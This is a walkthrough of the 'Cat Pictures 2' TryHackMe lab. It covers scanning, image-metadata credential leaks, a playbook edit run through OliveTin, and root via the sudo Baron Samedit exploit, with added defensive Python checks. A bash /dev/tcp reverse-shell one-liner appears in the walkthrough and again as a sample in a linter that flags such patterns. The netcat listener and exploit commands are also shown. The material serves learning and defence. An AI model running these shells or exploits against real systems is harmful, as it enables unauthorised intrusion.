TryHackMe: Cat Pictures 2

Published on 07-07, 2023


Link: Cat Pictures 2

Enumeration

  • Started by running an Nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-07 07:21 EDT
Nmap scan report for 10.10.130.123
Host is up (0.064s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.4.6 (Ubuntu)
222/tcp  open  ssh     OpenSSH 9.0 (protocol 2.0)
1337/tcp open  http    OliveTin
3000/tcp open  ppp?
8080/tcp open  http    SimpleHTTPServer 0.6 (Python 3.6.9)

The scan reveals 6 open ports:

  • SSH on port 22.
  • nginx on port 80.
  • SSH on port 222.
  • OliveTin on port 1337, a web interface for running predefined shell commands.
  • Gitea on port 3000.
  • nginx default page on port 8080.

  • On port 80 there is a Lychee photo album full of cat pictures, and since this room is about cats, it must be the way to the first flag.
  • I downloaded all the cat pictures and ran exiftool to read their metadata:
exiftool *.jpg


  • One of the pictures revealed the path to a text file on port 8080.

  • Checking that text file, we found credentials for Gitea.
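The leak above is a textbook case of metadata shipping with a published image: exiftool simply prints the JPEG comment and EXIF segments, so anything a maintainer typed into them (here, a path on an internal port) is visible to every visitor. As an added example that is not part of the original write-up, here is a small pure-Python pre-publish check that walks a JPEG's metadata segments and flags URL- or path-like strings. The sample JPEG is constructed inline (SOI, one COM segment, SOS, EOI), and the comment text in it is invented for the demonstration.

```python
import re
import struct

# Markers whose payload is free-form text that tools like exiftool print:
# COM (comment) and APP1 (usually EXIF/XMP).
TEXT_MARKERS = {0xFFFE: "COM", 0xFFE1: "APP1"}
SOS = 0xFFDA  # start of scan: compressed pixel data follows, no more metadata
EOI = 0xFFD9  # end of image

# URL-like or absolute-path-like strings are what we do not want in published images.
LEAK_PATTERN = re.compile(rb"(https?://\S+|/[\w./-]+\.\w+)")


def iter_segments(data: bytes):
    """Yield (marker, payload) for each JPEG segment up to the start of scan."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data):
        (marker,) = struct.unpack(">H", data[pos:pos + 2])
        if marker in (SOS, EOI):
            return
        # Segment length is big-endian and includes the two length bytes themselves.
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def find_metadata_leaks(data: bytes):
    """Return (segment_name, leaked_string) for URL/path-like text in metadata segments."""
    hits = []
    for marker, payload in iter_segments(data):
        name = TEXT_MARKERS.get(marker)
        if name is None:
            continue  # quantisation tables, Huffman tables, etc. carry no free text
        for m in LEAK_PATTERN.finditer(payload):
            hits.append((name, m.group(0).decode("ascii", "replace")))
    return hits


def build_jpeg_with_comment(comment: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, one COM segment, an empty SOS, then EOI."""
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + com + b"\xff\xda\x00\x02" + b"\xff\xd9"


# Constructed sample: a photo whose comment points at an internal file.
SAMPLE = build_jpeg_with_comment(
    b"Note to self: creds are at http://example.internal:8080/notes.txt"
)


def scan_sample():
    """Scan the constructed sample; used by the demo below."""
    return find_metadata_leaks(SAMPLE)


if __name__ == "__main__":
    for seg, text in scan_sample():
        print(f"[{seg}] possible leak: {text}")
```

Running `find_metadata_leaks(open(path, "rb").read())` over an album before it goes live is the cheap version of the check; the stricter fix is to strip COM/APP1 segments entirely on upload, since a photo album rarely needs them.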


FLAG 1:

  • After logging in to Gitea with the account we found, you will see a file named flag1.txt in the ansible repository.


FLAG 2:

  • Looking at the Ansible playbook, you will notice it contains a command-line task. The idea is to change that command and run the playbook from the OliveTin page on port 1337 to see whether our command gets executed.
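The weakness here is the chain, not any single piece: a web runner (OliveTin) executes a playbook straight from a repository that anyone with leaked Gitea credentials can edit, so whatever ends up in a shell/command task runs on the host. As an added example, not part of the original write-up, here is a line-based linter a defender could run on every push (or before OliveTin triggers a play) to list every executing task and flag obviously hostile commands. It deliberately avoids a YAML dependency; the playbook text, the key names it watches and the TEST-NET address in the sample are my own constructions.

```python
import re

# Ansible task keys whose value is handed to a shell or executed directly.
EXEC_KEYS = ("shell", "command", "raw", "script")
KEY_RE = re.compile(
    r"^\s*-?\s*(?:ansible\.builtin\.)?(" + "|".join(EXEC_KEYS) + r")\s*:\s*(.*)$"
)

# Command fragments that have no business in a playbook a web runner can trigger.
RISKY = {
    "reverse shell over /dev/tcp": re.compile(r"/dev/tcp/"),
    "interactive shell redirect": re.compile(r"\b(?:ba)?sh\s+-i\b"),
    "netcat with exec": re.compile(r"\bnc\b.*\s-[a-z]*e\b"),
    "download piped to shell": re.compile(r"(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
}
REVIEW = "executes a command (review)"


def scan_playbook(text: str):
    """Return findings as (line_no, task_key, reason, command) tuples."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = KEY_RE.match(line)
        if not m:
            continue
        key, cmd = m.group(1), m.group(2).strip()
        reasons = [reason for reason, pat in RISKY.items() if pat.search(cmd)]
        findings.append((line_no, key, "; ".join(reasons) if reasons else REVIEW, cmd))
    return findings


def has_risky_commands(text: str) -> bool:
    """True if any executing task matched a RISKY pattern (a CI gate would fail on this)."""
    return any(reason != REVIEW for _, _, reason, _ in scan_playbook(text))


# Constructed sample playbook: one benign task, one tampered task, one non-exec task.
SAMPLE_PLAYBOOK = """\
- hosts: all
  tasks:
    - name: say hello
      shell: echo "hello from ansible"
    - name: phone home
      ansible.builtin.shell: bash -c "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"
    - name: copy config
      copy:
        src: files/nginx.conf
        dest: /etc/nginx/nginx.conf
"""


def scan_sample():
    return scan_playbook(SAMPLE_PLAYBOOK)


if __name__ == "__main__":
    for line_no, key, reason, cmd in scan_sample():
        print(f"line {line_no}: {key}: {reason}\n    {cmd}")
    print("blocked" if has_risky_commands(SAMPLE_PLAYBOOK) else "ok")
```

The linter only reduces the blast radius; the real mitigations are putting authentication in front of OliveTin, running plays from a pinned, reviewed revision rather than the branch tip, and not letting the runner execute as a privileged account.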

Ansible playbooks


  • Since the command is executed, we can swap it for a reverse shell back to our machine:
bash -c "bash -i >& /dev/tcp/<your-ip-address>/4444 0>&1"


  • Before running the Ansible playbook, open a netcat listener:
nc -lvnp 4444


FLAG 3:

  • To speed things up, let's run linpeas to look for a privilege escalation vector.


  • The one that stood out was sudo being vulnerable to Baron Samedit.
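The reason linpeas can flag this with confidence is that Baron Samedit is purely a version question: the sudo advisory lists the affected builds as 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1, with the fix in 1.9.5p2. As an added example that is not from the original write-up, the check below parses `sudo --version` output and compares it against those ranges, which is the inventory check a defender runs across a fleet to find unpatched hosts. The version ranges are quoted from memory of the upstream advisory; the `parse_version`/`is_affected` names and the sample version strings are my own.

```python
import re
import subprocess

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Affected ranges as stated in the upstream sudo advisory for the
# Baron Samedit heap overflow (fixed in 1.9.5p2). Quoted from memory.
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),  # legacy 1.8.x line
    ((1, 9, 0, 0), (1, 9, 5, 1)),   # 1.9.x line before the fix
]


def parse_version(text: str):
    """Extract (major, minor, patch, p_level) from e.g. 'Sudo version 1.8.21p2'."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in: {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def is_affected(version) -> bool:
    """Tuple comparison puts 1.8.31p2 below 1.8.31p3 and 1.8.31 (p0) below 1.8.31p1."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def format_version(version) -> str:
    major, minor, patch, p = version
    return f"{major}.{minor}.{patch}" + (f"p{p}" if p else "")


def check_installed_sudo():
    """Run `sudo --version` on this host and return (version_string, affected)."""
    out = subprocess.run(
        ["sudo", "--version"], capture_output=True, text=True, check=False
    ).stdout
    v = parse_version(out)
    return format_version(v), is_affected(v)


if __name__ == "__main__":
    try:
        version, affected = check_installed_sudo()
        print(f"sudo {version}: {'AFFECTED - patch to 1.9.5p2 or later' if affected else 'ok'}")
    except (FileNotFoundError, ValueError) as exc:
        print(f"could not determine sudo version: {exc}")
```

Distribution packages often backport the fix without bumping the version string, so on Debian/Ubuntu hosts treat this as a first pass and confirm against the package changelog before raising an alarm.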


  • I downloaded the exploit, uploaded it to the target machine and compiled it:
make


  • Let's run sudo-hax-me-a-sandwich:
./sudo-hax-me-a-sandwich 0


  • Now that we are root, change directory to /root and grab the third flag.